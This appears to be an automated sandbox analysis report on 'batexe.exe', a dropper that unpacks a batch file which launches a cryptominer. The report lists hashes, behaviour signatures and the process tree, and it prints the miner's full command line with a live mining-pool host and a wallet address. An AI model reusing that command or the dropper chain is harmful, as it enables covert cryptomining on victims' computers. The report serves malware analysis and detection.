Analysis
-
max time kernel
299s -
max time network
306s -
platform
windows10-2004_x64 -
resource
win10v2004-20240221-ja -
resource tags
arch:x64arch:x86image:win10v2004-20240221-jalocale:ja-jpos:windows10-2004-x64systemwindows -
submitted
22/02/2024, 05:54
Behavioral task
behavioral1
Sample
batexe.exe
Resource
win10-20240221-ja
Behavioral task
behavioral2
Sample
batexe.exe
Resource
win10v2004-20240221-ja
General
-
Target
batexe.exe
-
Size
9.4MB
-
MD5
cdc9eacffc6d2bf43153815043064427
-
SHA1
d05101f265f6ea87e18793ab0071f5c99edf363f
-
SHA256
73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
-
SHA512
fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
-
SSDEEP
196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3844919115-497234255-166257750-1000\Control Panel\International\Geo\Nation batexe.exe Key value queried \REGISTRY\USER\S-1-5-21-3844919115-497234255-166257750-1000\Control Panel\International\Geo\Nation b2e.exe -
Executes dropped EXE 2 IoCs
pid Process 5012 b2e.exe 1792 cpuminer-sse2.exe -
Loads dropped DLL 5 IoCs
pid Process 1792 cpuminer-sse2.exe 1792 cpuminer-sse2.exe 1792 cpuminer-sse2.exe 1792 cpuminer-sse2.exe 1792 cpuminer-sse2.exe -
resource yara_rule behavioral2/memory/4592-9-0x0000000000400000-0x000000000393A000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 4592 wrote to memory of 5012 4592 batexe.exe 89 PID 4592 wrote to memory of 5012 4592 batexe.exe 89 PID 4592 wrote to memory of 5012 4592 batexe.exe 89 PID 5012 wrote to memory of 2360 5012 b2e.exe 90 PID 5012 wrote to memory of 2360 5012 b2e.exe 90 PID 5012 wrote to memory of 2360 5012 b2e.exe 90 PID 2360 wrote to memory of 1792 2360 cmd.exe 93 PID 2360 wrote to memory of 1792 2360 cmd.exe 93
Processes
-
C:\Users\Admin\AppData\Local\Temp\batexe.exe"C:\Users\Admin\AppData\Local\Temp\batexe.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4592 -
C:\Users\Admin\AppData\Local\Temp\4447.tmp\b2e.exe"C:\Users\Admin\AppData\Local\Temp\4447.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\4447.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:5012 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\4DFC.tmp\batchfile.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:2360 -
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.execpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 34⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1792
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.7MB
MD56dafaa4236ada8ac5307f209ba65e4b2
SHA1f72af508efbd0bafd4a8d189f5b6594cba6312c5
SHA256bd21de2003a095a270b31a606ef57d7ebc762ee5d9d8fc929f3b0f33d37e47c9
SHA5120a0300ee5fbcc04ada49480c6911a531eb16d8157dd3d11be6907f36851678ebfb013447ac7e56c597c16226bfd1fe34831860a8d7e0ad50b8c1eade9024eea6
-
Filesize
678KB
MD50fe03072d84eba1032ebbced918ec5d1
SHA1fbf75718647574ebba211a348e77a813de8b6096
SHA2564847e9f897a86d770827b9ba40ebb0badfb3a9c8eaa3e2f5cb5abe9688bd6dd0
SHA512b4c92fe7328f1ae3f19d760beb643d92f27499512cafe5d0cef3309c3b2ac16b6b2563926f0be1f1db500b3ab903255700592f394fbce2885d2a334cb93d5a64
-
Filesize
933KB
MD58516ef94b94e54c49eb62f2328ba7e35
SHA128bf3ce4dd2d91b92b1a30ab455aacac0302579f
SHA256910ff0aec9b9baf235a8e92ae9bfb38cf42552212b529da780ef86f821a7f4c3
SHA5129e3b62432c8714051caa9303c633539fcfa996f953cec5282618dc52794c33b4aab9f84789dc7817a5a3f65522a734984a2e6203ea7ea3d6b819928dfc79c8c3
-
Filesize
136B
MD58ea7ac72a10251ecfb42ef4a88bd330a
SHA1c30f6af73a42c0cc89bd20fe95f9159d6f0756c5
SHA25665e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9
SHA512a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0
-
Filesize
678KB
MD5fe1945e81976ce9868d528a9b39ad3e4
SHA117fee4519509c4f6036e33b2819d27b371265154
SHA256bd45e384155fc53e974c886baebbe5f4f1084cf5057e4f1f21664fa0688f51d1
SHA512099d09df4157dad30356d192a906d972f8b50d13dc91c047420d3ffa45b15588dedc326220534034c15790772652919eae58b41cb5bd6ffd41229736b08bd54f
-
Filesize
624KB
MD59c9d6b6e55cbf6f3ba56ccaec723239a
SHA1d45c349a4a11aa73457a97e6fb81cf6a56d2e277
SHA2560c54d0bd08cdd87c04aa16954c4da66ac6cd1167aa5b0d3fd9b6c9452bbc3e62
SHA51200cacd17ab71ffa0c3529cb1b3b6b505dd5d9919a0290f402642843c15437fb74910fca93b950455b65a96ea2cc73a026815b3ab08fb9c1136e0ae527d40bfcb
-
Filesize
640KB
MD5ac7d1c3bb4d3c69372907331267c1ee7
SHA1fa82689799785ef9ab4c304b1c1a6d2d9a961928
SHA256d22689ab67764158df7b19e8d78ec1393899f21e390f469a300975a31106c3aa
SHA5120d541661060d7c5eed486ea0377142e7d3883b3c0935114679af28bcae0b1767585fe06328955cf59aab4fe3d4acfba525dbc42675fbce80b7d0b2300784d125
-
Filesize
135KB
MD58466db025e5a42ae8587865bdd22d270
SHA18851cc7ff748d107a2500192e21c44ce632bedfa
SHA256ba0fe59bd9b3c8b13474d939b0e22d3368e731f02ae2983e1534c568b24d99fe
SHA512f8e5dace406f792b9159680e2c0514e55cd7568b66a67c2ce4b1f110a0ef9094a0c3189f330d1ad7df509ea8ea4ff4fdb25359567f24fc91511fd9469b43ffc6
-
Filesize
325KB
MD5ad6a1e66750a93a729299e74efa762df
SHA14549165a8530cf8fcf08f3163be7d65719f04675
SHA256d05bccf549cf9554b3938a51780ab1933e5e6b2e4708ac6d2f01d7f680064074
SHA51267e9f7209cbe56d5f94ed2fd6d18362eec2205c22e9939e0c86147fed254a185d79ceb0125780a0c314ffb4d77e847f100cf8b20deb38bf56618156b84e59d90
-
Filesize
523KB
MD5194e2694df9df4fb8228866a5e5ff5e8
SHA1189c94576e0102fa302af3661758383ccc29aa07
SHA25600b8008323493de02d7298d087e121fc39fe5021042c332ca7abc46bab885ea6
SHA5129c3a4732a460d73450f71eac143a0b3dde86afce5c655dd833e8dcb2ec1d1d499552429c0ac20ebcaf8b68a6d04fd3e20147349ad25091f1e2689083bb76b046
-
Filesize
324KB
MD5ad59d861945160a909e2523f00ef7706
SHA1953f68c463710c43e1ed5687df4852c5be7a377d
SHA256c1f2566b3e88e5beca048893daabf8e3725c7aef0618c72157492044e614de56
SHA512a8dfc87ce51cf154d58ff7b09e11af5c6ec5e3bde61f1ddf2ce44c20f692a2646fef5746a41c5c813e9d8a27873cfacfc1709ccea8221ce7a7c04e9970fe14d0
-
Filesize
405KB
MD50e027b3f06d5d9d353df369f4e7991e3
SHA1836fc5a0bf60fae9a99a7b8b28b4ae70f779aab4
SHA25672027013602de91462018986af134619c2c83c3a5c08c69b2796571f66e7453d
SHA51263e637ef3c8b739688c59dc89f2129c4c36a44c2485c51df58e393a769102c8bc189aed051b3f010b1a0fe7adc3fb36e85db4efa01a25bad77ef9e0357b17248
-
Filesize
212KB
MD56bf9c2053ac25f0adf1080ae055d6359
SHA1479e5fe24cd0bb18db65830a1f0db755c0bcbaa0
SHA256ebd7e2d75068eff91400d020b58721fc235c459cd3f771be25bde4773b80c700
SHA51249909379312d33e288cfa7f346670ba82f1a6d859ac7c855719b4da87ca79d6258414804b9dded462692299c70a376590a080a4e40aad086102867127483d301
-
Filesize
384KB
MD5eec15153c344f43f1919cb379b9ee2f9
SHA13e4a09390ac885ea2797209603bcfa1ec6ff0cc6
SHA2564e4d7ecae87e8e656c61af89ef17146baf33fbf09ffbde6ae971d04e8e8f9222
SHA5127cdf3552341d14979838f8fedf9ac63482152f193ab8f7e0af281ec50b2a43312d78c0e22e79989818c5041538fa69769350e1e6cf0789a165be1eb11ee29908
-
Filesize
343KB
MD56bfa210d39e1146a5b2be32c8f303b2b
SHA13bacf890da9fb05b4c88bed477ed1b40babcc505
SHA25614b15b452861a46a5158c4ffcf35556ac8f644ccc8e24e5396f9cf06ef4c55ab
SHA51239eafac23d3916368431ea3dd5ccca6f91c5d96502f69ed4b100b95a3aba82695a96a4ca7aa9b4693a17c0d707d38ea60df231062bf043b790642de66c6615d6